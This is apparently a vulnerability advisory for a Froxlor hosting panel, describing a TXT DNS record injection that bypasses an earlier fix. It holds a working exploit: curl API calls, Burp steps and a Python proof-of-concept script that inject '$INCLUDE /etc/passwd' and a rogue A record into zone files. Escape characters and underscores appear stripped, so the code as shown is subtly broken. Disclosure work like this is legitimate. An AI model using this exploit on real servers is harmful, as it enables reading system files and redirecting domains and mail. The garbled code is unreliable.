CVE-2026-41234

Summary

Affected Code

} elseif ($type == 'TXT' && !empty($content)) {
  // check that TXT content is enclosed in " "
  $content = Dns::encloseTXTContent($content);
}

// TODO regex validate content for invalid characters

Comparison with CVE-2026-30932 fix

PoC

Environment

• Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
• DNS enabled (system.bind enable=1, system.dnsenabled=1)
• Customer with dnsenabled=1, domain with isbinddomain=1
• Customer has an API key (or uses the web UI DNS editor with Burp)

Reproduction via API

# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API KEY:API SECRET" 
 -H 'Content-Type: application/json' 
 -d '{
  "command": "DomainZones.add",
  "params": {
   "domainname": "testdomain.lab",
   "type": "TXT",
   "record": "@",
   "content": "v=spf1 +all"
$INCLUDE /etc/passwd",
   "ttl": 18000
  }
 }' 
 https://panel.example.com/api.php

Reproduction via Web UI (Burp)

1. Log in as a customer with DNS editing enabled
2. Navigate to Resources > Domains > (domain) > DNS Editor
3. Add a new record: Type = TXT, Record = @, Content = any
4. Intercept the POST request in Burp Suite
5. Change the dns content parameter to: v=spf1 +all"%0a$INCLUDE /etc/passwd (%0a is URL-encoded newline)
6. Forward the request

Result

$TTL 604800
$ORIGIN testdomain.lab.
@  604800 IN SOA froxlor.lab admin.froxlor.lab. 2026041004 ...
@  18000  IN TXT "v=spf1 +all"
$INCLUDE /etc/passwd"
@  604800 IN A  100.95.188.127
*  604800 IN A  100.95.188.127

Variant: Arbitrary DNS record injection

curl -s -u "API KEY:API SECRET" 
 -H 'Content-Type: application/json' 
 -d '{
  "command": "DomainZones.add",
  "params": {
   "domainname": "testdomain.lab",
   "type": "TXT",
   "record": " spf",
   "content": "v=spf1 +all"
evilt18000tINtAt6.6.6.6",
   "ttl": 18000
  }
 }' 
 https://panel.example.com/api.php

 spf  18000 IN TXT "v=spf1 +all"
evil  18000 IN A  6.6.6.6

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.5 TXT Zone Injection — Incomplete CVE-2026-30932 Fix"""
import json, sys, requests, urllib3
urllib3.disable warnings()

def api(target, key, secret, cmd, params=None):
  return requests.post(f"{target.rstrip('/')}/api.php",
    auth=(key, secret), json={"command": cmd, "params": params or {}},
    verify=False).json()

target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]

# Inject $INCLUDE
r = api(target, key, secret, "DomainZones.add", {
  "domainname": domain, "type": "TXT", "record": "@",
  "content": 'v=spf1 +all"
$INCLUDE /etc/passwd', "ttl": 18000})

for line in r.get("data", []):
  tag = "  <-- INJECTED" if "$INCLUDE" in str(line) else ""
  if line: print(f" {line}{tag}")

print("
CONFIRMED" if any("$INCLUDE" in str(l) for l in r.get("data",[])) else "FAILED")

Impact

1. Information Disclosure: $INCLUDE directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via DomainZones.listing or DNS queries to records created from parsed file lines.
2. DNS Record Injection: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.
3. DNS Service Disruption: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. $GENERATE directives can create massive record sets for amplification.

Suggested Fix

// lib/Froxlor/Api/Commands/DomainZones.php, around line 306
} elseif ($type == 'TXT' && !empty($content)) {
  // Strip characters that can break zone file format
  $content = str replace(["
", "r", "t"], '', $content);
  $content = Dns::encloseTXTContent($content);
}